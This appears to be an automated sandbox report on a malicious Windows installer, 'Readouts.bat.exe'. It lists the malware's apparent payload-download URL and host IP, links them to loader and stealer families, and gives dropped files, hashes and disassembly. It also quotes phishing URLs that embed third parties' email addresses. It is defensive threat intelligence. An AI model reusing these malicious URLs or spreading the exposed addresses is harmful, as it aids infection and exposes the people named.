              http://kkaou.lamd.shop/ts.bin%Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://kkaou.lamd.shop/ts.bincReadouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://kkaou.lamd.shop/ts.binwshqos.dll.muiReadouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://kkaou.lamd.shop/ts.binmReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdReadouts.bat.exe, 00000003.00000001.1851018769.00000000005F2000.00000008.00000001.01000000.00000009.sdmpfalse
                		high
                http://kkaou.lamd.shop/ts.biniReadouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://kkaou.lamd.shop/ts.bin6Readouts.bat.exe, 00000003.00000002.2594681674.0000000002928000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://kkaou.lamd.shop/ts.bintReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://kkaou.lamd.shop/ts.bin3Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://kkaou.lamd.shop/ts.binrReadouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://kkaou.lamd.shop/ts.binqReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Readouts.bat.exe, 00000003.00000001.1851018769.0000000000649000.00000008.00000001.01000000.00000009.sdmpfalse
                    		high
                    http://kkaou.lamd.shop/ts.bin0Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://kkaou.lamd.shop/ts.binwshqos.dll.muiYReadouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdReadouts.bat.exe, 00000003.00000001.1851018769.00000000005F2000.00000008.00000001.01000000.00000009.sdmpfalse
                      		high
                      http://kkaou.lamd.shop/ts.binzReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://kkaou.lamd.shop/ts.bin8Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://kkaou.lamd.shop/ts.binmswsock.dll.muiReadouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://kkaou.lamd.shop/ts.binGReadouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://kkaou.lamd.shop/ts.binBReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        172.93.121.126
                        		kkaou.lamd.shopUnited States
                        		393960HOST4GEEKS-LLCUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1562049
                        Start date and time:2024-11-25 07:08:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Readouts.bat.exe
                        Detection:MAL
                        Classification:mal76.troj.evad.winEXE@3/9@1/1
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:
                        • Successful, ratio: 89%
                        • Number of executed functions: 47
                        • Number of non-executed functions: 32
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        01:10:16API Interceptor119x Sleep call for process: Readouts.bat.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        172.93.121.126Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousCredential FlusherBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 13.107.246.63
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 13.107.246.63

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          HOST4GEEKS-LLCUShttps://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                          • 185.221.216.102
                          https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                          • 185.221.216.102
                          https://mkwomens.com/iuefoiuherjhkjf/iuyrijkfjkoifjoijreiwiw/e9c4710345f07b1cf048900d092f8cdc/YW5nZWxhLnN1bW1lcnNieUBhc2h1cnN0LmNvbQ==Get hashmaliciousUnknownBrowse
                          • 172.93.120.13
                          https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//colignymart.com/kiloa/memei/QepXS7lFNwbUolrMPBrA5Cn1RJP/a3Jpa29yLnllbWVuamlhbkBzcnMuZ292&..=c&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogoGet hashmaliciousUnknownBrowse
                          • 172.93.120.138
                          https://LJpPCV.us8.list-manage.com/track/click?u=e9500d6fdb7f438633b429d1c&id=4450af0bff&e=c4b439d238Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                          • 185.221.216.128
                          https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                          • 185.221.216.128
                          https://www.google.com/url?q=https%3A%2F%2Ftrimmer.to%2FPlfGc&sa=D&sntz=1&usg=AOvVaw1DTVuO2H6PM4yLoWCUd_D9Get hashmaliciousHTMLPhisherBrowse
                          • 172.93.120.113
                          https://m.exactag.com/cl.aspx?extProvApi=sixt-crm_newsletter&extProvId=313&extPu=nl_rac_de&extLi=DE_COR_RENT_CRM_B2C_24_CW33_From%20Intermediate%20Push_ONT_NLW_de_DE_Streichpreis_138402&extCr=Footer_rent&extSi=nl_rac_de_2408_DE&url=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%76%69%64%79%61%73%61%67%61%72%2D%70%74%74%69%2E%69%6E%2F%77%61%2F%66%61%2Fsgmflefb4v8va/%2F/bWF0dGhldy5kYXZpc0BtYnUuZWR1Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                          • 172.93.120.138
                          https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/naimestyles.com%2Frtwo%2Fn%2FNUaX8EOAfixpQMTfRAnHcKww/eGlzaEBub3ZvenltZXMuY29tGet hashmaliciousHTMLPhisherBrowse
                          • 172.93.120.103
                          https://naimestyles.com/rtwo/n/3rrLaAvg41CM3J4mAJYroltS/c3BhY2VpbnZpZGVvc0Blc2EuaW50Get hashmaliciousHTMLPhisherBrowse
                          • 172.93.120.103

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\LangDLL.dllAccount& Payment Transfer Details_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            Account& Payment Transfer Details_pdf.exeGet hashmaliciousGuLoaderBrowse
                              https://updatecdn.meeting.qq.com/cos/37a67c4f1858c83dff9f22a27bb8f27d/VooVMeeting_1410000197_3.23.1.510.publish.exeGet hashmaliciousUnknownBrowse
                                3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exeGet hashmaliciousGuLoaderBrowse
                                  3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exeGet hashmaliciousGuLoaderBrowse
                                    rjustificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse
                                      rjustificantePago_es_180214093508pdf.exeGet hashmaliciousGuLoaderBrowse
                                        CI890892.6409410669pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          CI890892.6409410669pdf.exeGet hashmaliciousGuLoaderBrowse
                                            vxJjLEvhQU.exeGet hashmaliciousGuLoader, RemcosBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\LangDLL.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):5632
                                              Entropy (8bit):3.81704362174321
                                              Encrypted:false
                                              SSDEEP:48:S46+/p2TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mhofjLl:zf2uPbOBtWZBV8jAWiAJCdv2CmwL
                                              MD5:3DD80DFF583544514EEB3A5ED851A519
                                              SHA1:56F7324D9D4230C96D1963E7B3E02B05A6CF5C24
                                              SHA-256:86CFF5EACA76C49F924CB123D242FDCFD45AB99C4B638D3B8F4A8CFB1970AB5B
                                              SHA-512:955F4DF195B5D134449904E9020F80125CFB64D70D9482FF583451F3FCB10D15577CEAC4180F71A96452D8478F6365160AB15731F9A79A494383087C9310FD1D
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse
                                              • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious, Browse
                                              • Filename: , Detection: malicious, Browse
                                              • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse
                                              • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious, Browse
                                              • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                              • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious, Browse
                                              • Filename: CI890892.6409410669pdf.exe, Detection: malicious, Browse
                                              • Filename: CI890892.6409410669pdf.exe, Detection: malicious, Browse
                                              • Filename: vxJjLEvhQU.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L.....oZ...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\System.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):11776
                                              Entropy (8bit):5.890541747176257
                                              Encrypted:false
                                              SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                              MD5:75ED96254FBF894E42058062B4B4F0D1
                                              SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                              SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                              SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 3%
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\frtr.jpg

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 2000x2000, components 3
                                              Category:dropped
                                              Size (bytes):165466
                                              Entropy (8bit):6.5947581943238625
                                              Encrypted:false
                                              SSDEEP:3072:b9bANrxjToG8aMvWDtSYT8TBs9M/U2UKEVKQUsLNcY/:Sxj5AeyBN/U2L6KQfNZ
                                              MD5:152B2AA9B4B656DF132C2E5EAD37A7D5
                                              SHA1:9C0FDBAAB3A483D4857BB8A2269CD21177BBD1D9
                                              SHA-256:11970E0E0D67A2FD31BD5907E279F43F52A3B2547391FF843B52BF79062CA00F
                                              SHA-512:4D756CC91321FD2646D5383E3EC3F736BA2B59DD46C912D9D28CD67858A4FA9A6E2FD8312F91D1EEA4392B01830DDD1F59B40353265D0B9CA84F7DA2D62F2E10
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((.....................................................Z........................!..1.."AQ.2aq..#B...R...$3br.4Cs...%&5STc..6D...dt...7.'EUu....................................3........................1.!23AqQ."a#4..$B...R..D.............?..H..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\lukkedagenes.fli

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):321960
                                              Entropy (8bit):1.240482616634199
                                              Encrypted:false
                                              SSDEEP:768:phtcv5KE3yqV0L8Xi1Sk4gVNBo/iZcRxZq129cB/ckCkoPtvb292Qrg/Bt2bNsQe:utkxDPfCkoGBdszPmWJqU
                                              MD5:66087BEC9068998EE8F271F0580AB3F5
                                              SHA1:80980F5A1BD6DAF01263730273F945B031F75AE3
                                              SHA-256:248D9672E365A5C58F1AF62BA50E7FA4BFCF518846DA63ACA19797201C9E5F44
                                              SHA-512:046A00F3DB8C6A5C2BD71A43D13FEC6418AA0E30EA77CA12BEB082F8EDCFF9D3F31BCAD7B40A6D02722F5092215279681A96E103503063A52786314D21FE83FD
                                              Malicious:false
                                              Reputation:low
                                              Preview:...............................................................S...................................d...........................c........kY....................................................b..........~..f..............o.....................i...........................................................................................z...N...............b..............................@........................ ................;.............../..............$..........J....................I..~.......................................u........................................................................................................................+E.....................u.............j...................................a........................".................6.....4.....................................................................................................z.................P........................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon\opisthocomine.nit

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):263192
                                              Entropy (8bit):1.2599632446975992
                                              Encrypted:false
                                              SSDEEP:768:XWXGdC9WRz+JhP7he1s7N4PjZlGpwlN8HmDEh/jTqcx1uNp9ieDc0VSLrPSsGCCu:IGdVcNN49lGp5UibEBfJv
                                              MD5:0EDAE6068FC853ECD4597C0C717729E8
                                              SHA1:8F02F7B5B9524451D3E2FA336B898883E8707FEA
                                              SHA-256:FA5E6764D56E5EBCB89C97A192ADF8F246D7E3C5683A5864C7A8714DD977210C
                                              SHA-512:EF8D9006A9FC63F31F6677C6500C8C9AD13CDCF45F76AAB2EAD30CE98DD223D87782DC29869B9D3C7C0729320DF341CF25F384F0EC775A8F4EA6F5BEA101EC2D
                                              Malicious:false
                                              Reputation:low
                                              Preview:........................................................................................................................a......................f.........iU........................n..................................!................................X..................F......M...............................................7.....................l................@.........G..............I...........................................................................4..............I.............................................................................-....$......................^................................................................................................q...............s............................./........................................g...J....}.......j..........................gs.......................................L......H...........~.................L............E.........(................................................O.......................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\Destructibility232.Hae

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):300215
                                              Entropy (8bit):7.60202307149698
                                              Encrypted:false
                                              SSDEEP:6144:oVqhTWP564sPg9kuKsookY0xGDqAaToGG9h7kLPIHDm9J5/3b6DAg:oypsookJMQomdGDAg
                                              MD5:8499C7BD10DABAF8DF8745B57F612F73
                                              SHA1:9C25FFAFDF9D6AF07EB5BD7B8A897509E65DE3F5
                                              SHA-256:2F7D4CD8374D5F7EE7D59BF06036E3C4E1035455D95E90D04AE0DA12C3AA3F3C
                                              SHA-512:7456BEE05A7DAEF8DE41C39105955ED83CCBEB409A32F1E97CC822FB9BC4C0054020E32FFAABE7DB95CB7DD48D0DFE85A320D96461F83452D579A51903E43484
                                              Malicious:false
                                              Reputation:low
                                              Preview:...v.....RR..........ooo.LLL..............X.......KKKKKK....V......CCCCC.......6666666....X...........Z..11................................!.fffff.....^^^..S.%.........R.f.......o........w.l................#..............,...f...yyyyyy.............PPP.cccc...y......mmmmmm............0.......y....h.kk.........................FFFF...====.......o.....66..W..................................[...4..............``......QQQQQ..............................<<..............mmmm.....C.))).a.....................<...1.vv....../////......................8......(....e..........................QQ....yyyyy................#......................5..............l.........W...nn......W.............YY......-.......FF.NN.......MM................>>........LLL..............uuuuuuuuu..../.e.T..........77.......""".......................R..r.....i.........``......................................c.....{......uuuu.........44.......|..........C.......OO................E.(.G..............)....V.....q....;............

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\Fraggings79.Bou

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):119900
                                              Entropy (8bit):2.6586250127926325
                                              Encrypted:false
                                              SSDEEP:1536:6jdC216hYLvIhMoEneRjeYCnZZH9yaLj6Ovo7UD9D5yv:S6LUJNI
                                              MD5:F0EE2E4C32204D0D0C8D15CB8AD658FD
                                              SHA1:25ABC78C1F4D4A50C5630C44554C221E72487DF0
                                              SHA-256:B6464B7D7E39E076B3D4B51593FA7681493B367BB87C760D572179CFE01356BF
                                              SHA-512:D5EAB7411129B7A16D79D5A8F2724469AA6DC6AEEFCF3B829EA6246EBCC6875D1E4254922218761D06C45A2506E2D95A0F96479788CDD63524D2066D18548484
                                              Malicious:false
                                              Preview:0000000085858585000000005A00B8000000060606060000000000B80000515151510000000000B8B8000000320000A200C7C7C7C70000C60000000202020202004E4E0000B40000C500006B6B6B00005D00A1A1A1A100000F0F0F0F00000000AD00D2D2005F5F0000F8008585000606060000000000DC00BB00005600BD0000760000001A00050023232300000000F1F10000000000003600250000390000000000009C9C00525252007B00E6E6E600000000373700F5F5008A00BD00860000DD0000CCCC00002D00777700E6000047470000009600CDCDCDCDCD0000160000C1C1003A00000000008500BCBCBC000000000000009200AD0000006D6D6D6D00B0006D00939300007800AE0000410000080808002E2E0000FF00004C4C00373737370000CECE0000646464000000525252525252520000000300005A5A5A5A00909090000036360000F6F6000700FBFBFB00CACA0000710000F1F1F10000ABAB00130000000000000000000000001A00000000C9006F000000CECE00002700000000A800EA00270000009500005E000000007D7D0000FF00F800009B00002B000017171700910000006200000000FEFE0000009300EEEEEEEE00000000000000940000000000006F000069000000000000ADADAD000000F600FAFA007B7B7B7B004D006A00BB0000000000000000004D00000066

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Svovlkalk101\defencives.pol

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):455315
                                              Entropy (8bit):1.2477113828127742
                                              Encrypted:false
                                              SSDEEP:1536:o/yCFoEvvG0yx5hyNnuPwAVpwtCTuOf9aSDAUg:o/2Enyx5+uPwAnwMSADAUg
                                              MD5:761F2A757CD380F71E205335CE088495
                                              SHA1:7E1C38708629925DF64A30EB0B722A7C44FA6150
                                              SHA-256:56A1E386A92086888D3C0F9437CC34AACFF1AF55D59A0393EEBC220D4BC2697B
                                              SHA-512:5DB2A3E96E93E576E861F10296DB05ED890311EE2F31D930B330DCB418246C9E3C750272CCB781811B3C8BFAD940ACAB64040F72786DE4A839C7238B984E2E02
                                              Malicious:false
                                              Preview:.5......................&.............................a....b.......................e.....................6..........H......................1.....a..J......................L.........................l...........a......................................I...............Y...................4...........................................w.............................................m.......D.......................(................................................................V........................................W.......................................................n.......D.....................................................................}....................................................................................................................z......................................:.....G..N:........................1............N.....................M.......................8.......................................................................Z......b...:...................

                                              C:\Windows\Resources\0809\mysterist.ini

                                              Download File
                                              Process:C:\Users\user\Desktop\Readouts.bat.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):38
                                              Entropy (8bit):4.006841738213845
                                              Encrypted:false
                                              SSDEEP:3:kQMicv7Wz+v:clvSz+v
                                              MD5:8674B487F44FE91156094E810B1A3128
                                              SHA1:27F1EB1FBAFFBD6AF90FD2F084081BD4A96E9498
                                              SHA-256:4F0B489724F53D0E8C6BFE50C9EA02251EEBDD7A96855091C2F6E8768F683E5D
                                              SHA-512:4AE1B103E5E58D5EEA6EC6DB2E4DA96557B88C32CE6860E9B2986C628DD26B95162261F33E6036388184FFA5256B45BE91BE7E8C9DA85BD5945E29F2360D19E9
                                              Malicious:false
                                              Preview:[parsimoniously]..Vesigia=unassessed..

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.195535478027114
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Readouts.bat.exe
                                              File size:993'977 bytes
                                              MD5:492707a5e753b9c5faa6a9829e065775
                                              SHA1:7a48c9ae447780551a9714b5cccde57f16094e01
                                              SHA256:8a0a6bad685a0e4517d2f1e8f70fff1195c78470e467255dfeb1c3f7ec922514
                                              SHA512:e7ab1808dadb1a1da12ac66e6f9c631a5ca58b4575bebfba21aa6b6907153bd8e4af2904e3039a77f0a4f9bc94cd408f108c05181878270c5446862b01ffa707
                                              SSDEEP:24576:oewAoAZIk1OYV8pC0SUGKSGnx7eq0xQUsHVSm:CAFLErOUGKSe5eq0xQhHs
                                              TLSH:3925D002EF59C787C2FA6E7449F6B7052A2DCBC998D38F02E64568D8F670F5874C8684
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....

                                              File Icon

                                              Icon Hash:c5cdc989d5cde097

                                              Static PE Info

                                              General

                                              Entrypoint:0x403359
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:b34f154ec913d2d2c435cbd644e91687

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [esp+14h], ebx
                                              mov dword ptr [esp+10h], 0040A2E0h
                                              mov dword ptr [esp+1Ch], ebx
                                              call dword ptr [004080A8h]
                                              call dword ptr [004080A4h]
                                              and eax, BFFFFFFFh
                                              cmp ax, 00000006h
                                              mov dword ptr [0042A20Ch], eax
                                              je 00007F8ED4B4F643h
                                              push ebx
                                              call 00007F8ED4B528F5h
                                              cmp eax, ebx
                                              je 00007F8ED4B4F639h
                                              push 00000C00h
                                              call eax
                                              mov esi, 004082B0h
                                              push esi
                                              call 00007F8ED4B5286Fh
                                              push esi
                                              call dword ptr [00408150h]
                                              lea esi, dword ptr [esi+eax+01h]
                                              cmp byte ptr [esi], 00000000h
                                              jne 00007F8ED4B4F61Ch
                                              push 0000000Ah
                                              call 00007F8ED4B528C8h
                                              push 00000008h
                                              call 00007F8ED4B528C1h
                                              push 00000006h
                                              mov dword ptr [0042A204h], eax
                                              call 00007F8ED4B528B5h
                                              cmp eax, ebx
                                              je 00007F8ED4B4F641h
                                              push 0000001Eh
                                              call eax
                                              test eax, eax
                                              je 00007F8ED4B4F639h
                                              or byte ptr [0042A20Fh], 00000040h
                                              push ebp
                                              call dword ptr [00408044h]
                                              push ebx
                                              call dword ptr [004082A0h]
                                              mov dword ptr [0042A2D8h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebx
                                              push 004216A8h
                                              call dword ptr [00408188h]
                                              push 0040A2C8h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x5ab18.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
